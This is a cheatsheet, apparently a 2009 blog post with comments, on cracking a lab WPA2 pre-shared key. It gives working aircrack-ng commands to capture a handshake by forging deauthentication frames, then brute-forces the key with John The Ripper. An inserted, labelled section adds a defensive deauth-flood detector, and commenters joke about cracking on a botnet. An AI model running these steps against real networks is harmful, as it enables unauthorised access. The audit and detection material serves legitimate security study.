Published February 24, 2009 | By Corelan Team (corelanc0d3r)
Basic steps :

• Put interface in monitor mode
• Find wireless network (protected with WPA2 and a Pre Shared Key)
• Capture all packets
• Wait until you see a client and deauthenticate the client, so the handshake can be captured
• Crack the key using a dictionary file (or via John The Ripper)



I'll use a Dlink DWL-G122 (USB) wireless network interface for this procedure. In backtrack4, this device is recognized as wlan0.

First, put the card in monitor mode :

root@bt:~# airmon-ng

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]

root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)

Ok, we can now use interface mon0



Let's find a wireless network that uses WPA2 / PSK :

root@bt:~# airodump-ng mon0

 CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57

 BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:19:5B:52:AD:F7  -33        5        0    0  10  54  WPA2 CCMP   PSK  TestNet

 BSSID              STATION            PWR   Rate  Lost  Packets  Probe

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1    12        4  TestNet

Stop airodump-ng and run it again, writing all packets to disk : 

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2 

At this point, you have 2 options : either wait until a client connects and the 4-way handshake is complete, or deauthenticate an existing client and thus force it to reassociate. Time is money, so let's force the deauthentication. We need the bssid of the AP (-a) and the mac of a connected client (-c) :

root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

As a result, airodump-ng should indicate "WPA Handshake:" in the upper right corner :

 CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54  WPA2 CCMP   PSK  TestNet

 BSSID              STATION            PWR   Rate  Lost  Packets  Probe

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54     0      230
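The "Sending 64 directed DeAuth" line above is also what the defending side sees: dozens of deauthentication frames to one station inside a second, where a legitimate network produces one now and then. The following is an added example, not code from the original post, of the detection logic a wireless IDS applies to that pattern. It runs over a constructed list of decoded 802.11 frame records (the BSSID and station address are the ones from the capture above; the record format, the threshold and the window length are my assumptions) and flags any transmitter/receiver pair whose deauth or disassociation frames reach a threshold inside a short sliding window.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# Decoded 802.11 frame record (constructed format, not a real tool's output):
# (timestamp_seconds, frame_type, frame_subtype, receiver_addr, transmitter_addr)
Frame = Tuple[float, int, int, str, str]

MGMT = 0          # 802.11 frame type 0 = management
BEACON = 8        # management subtype 8
DISASSOC = 10     # management subtype 10 (0xA)
DEAUTH = 12       # management subtype 12 (0xC)

AP = "00:19:5B:52:AD:F7"         # BSSID from the capture above
VICTIM = "00:1C:BF:90:5B:A3"     # station from the capture above
OTHER = "00:11:22:33:44:55"      # constructed second station


def detect_deauth_bursts(frames: List[Frame], threshold: int = 10,
                         window: float = 2.0) -> List[Dict]:
    """Flag (transmitter, receiver) pairs whose deauth/disassoc frames
    reach `threshold` inside any sliding interval of `window` seconds.

    A single deauth is normal (a client leaving); dozens within a second
    is the signature of a forged deauth flood."""
    per_pair: Dict[Tuple[str, str], List[float]] = defaultdict(list)
    for ts, ftype, subtype, receiver, transmitter in frames:
        if ftype == MGMT and subtype in (DEAUTH, DISASSOC):
            per_pair[(transmitter, receiver)].append(ts)

    alerts = []
    for (src, dst), times in per_pair.items():
        times.sort()
        lo, best, best_start = 0, 0, None
        for hi, t in enumerate(times):
            # shrink the window from the left until it spans <= `window` seconds
            while t - times[lo] > window:
                lo += 1
            if hi - lo + 1 > best:
                best, best_start = hi - lo + 1, times[lo]
        if best >= threshold:
            alerts.append({"transmitter": src, "receiver": dst,
                           "count": best, "window_start": best_start})
    return alerts


def build_sample_frames() -> List[Frame]:
    """Constructed traffic: a minute of beacons, three benign deauths to
    OTHER spread 30 s apart, and a 64-frame burst towards VICTIM that
    mirrors the aireplay-ng output above."""
    frames: List[Frame] = []
    for i in range(600):                                  # ~1 min of beacons
        frames.append((400.0 + i * 0.1, MGMT, BEACON, "ff:ff:ff:ff:ff:ff", AP))
    for ts in (410.0, 440.0, 470.0):                      # benign, isolated
        frames.append((ts, MGMT, DEAUTH, OTHER, AP))
    for i in range(64):                                   # forged flood, ~1 s
        frames.append((450.0 + i * 0.015, MGMT, DEAUTH, VICTIM, AP))
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_bursts(build_sample_frames()):
        print(alert)
```

In a real deployment the records come from a monitor-mode capture (the .cap file airodump-ng writes parses with any pcap library). A forged deauth carries the AP's address as transmitter, so the detector cannot distinguish it from a genuine one by address; the rate is the signal. The fix on the network side is 802.11w (Protected Management Frames), which lets stations and APs discard deauth frames that fail the integrity check, so the flood no longer forces a fresh handshake.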

Stop airodump-ng and make sure the files were created properly 

root@bt:/# ls /tmp/wpa2* -al

-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

From this point forward, you do not need to be anywhere near the wireless network. All cracking will happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact, I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc. . . . Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time. There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success, and one that is very slow but guarantees that you will find the key at some point in time.

The first option is by using a wordlist/dictionary file. A lot of these files can be found on the internet (e.g. www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the wordlist and feed it the .cap file that contains the WPA2 Handshake.

So if your wordlist is called word.lst (under /tmp/wordlists), you can run 

aircrack-ng -w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all.

The second method (bruteforcing) will be successful for sure, but it may take ages to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theory you would have to build every password combination with all possible character sets and feed them into aircrack. If you want to use John The Ripper to create all possible password combinations and feed them into aircrack-ng, this is the command to use :

root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

(Note : the PSK in my testlab is only 8 characters, contains one uppercase character and 4 numbers). I will post the output once the key has been cracked, including the time it required to crack the key.

That's it 



Update : after 20 hours of cracking, the key still has not been found. The system I'm using to crack the keys is not very fast, but let's look at some facts :

8 characters, plain characters (lowercase and uppercase) or digits = each character in the key could have 26+26+10 (62) possible combinations. So the maximum number of combinations that need to be checked in the bruteforce process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896. At about 600 keys per second on my "slow" system, it could take more than 101083382 hours to find the key (11539 years). I have stopped the cracking process as my machine is way too slow to crack the key while I'm still alive ... So think about this when doing a WPA2 PSK Audit.

© 2009, Corelan Team (corelanc0d3r). All rights reserved.





6 Responses to Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper 






https://www.corelan.be/index.php/2009/02/24/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper/

4/17/2014

Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper | Corelan Team




dellnull says:

October 7, 2009 at 10:48

Yeah WPA cracking is slow ;-) So it's better to use wordlists first, and then, if not cracked, use bruteforce mode, preferably in a botnet controlled by you ;-) Let those bots do some work!!


Peter Van Eeckhoutte says:
October 7, 2009 at 11:10

That's an interesting way of looking at it :-)

Another technique would be to use the power of a GPU (for example a NVIDIA graphics card) to speed up the cracking process :

http://code.google.com/p/pyrit/

http://pentestit.com/2009/07/28/wireless-security-cracking-gpus/


dellnull says:

October 9, 2009 at 16:45

Yeah, GPU's much faster, but still this will take a long time, like millions of years to walk through the keyspace. I would go for a crack on a botnet, maybe combined with GPU when available in some of the bots


Peter Van Eeckhoutte says:
October 9, 2009 at 18:24

true - does anyone have a spare botnet somewhere I can use ? :-) 


caxxxolina says:
March 26, 2010 at 23:12

hi Peter,

thank you for this tutorial

twice or three times you write "Stop airodump-ng and [...]"

what do you mean ???

do i have to close the active window then ?

or do i have to right-click over the window and "send signal" something ???
or do i have to go through your tutorial in a new window ?

thank you very much indeed,
caxxxolina


Peter Van Eeckhoutte says:
March 26, 2010 at 23:16

Hi, 

Just press CTRL+C or something, to close the running airodump-ng process 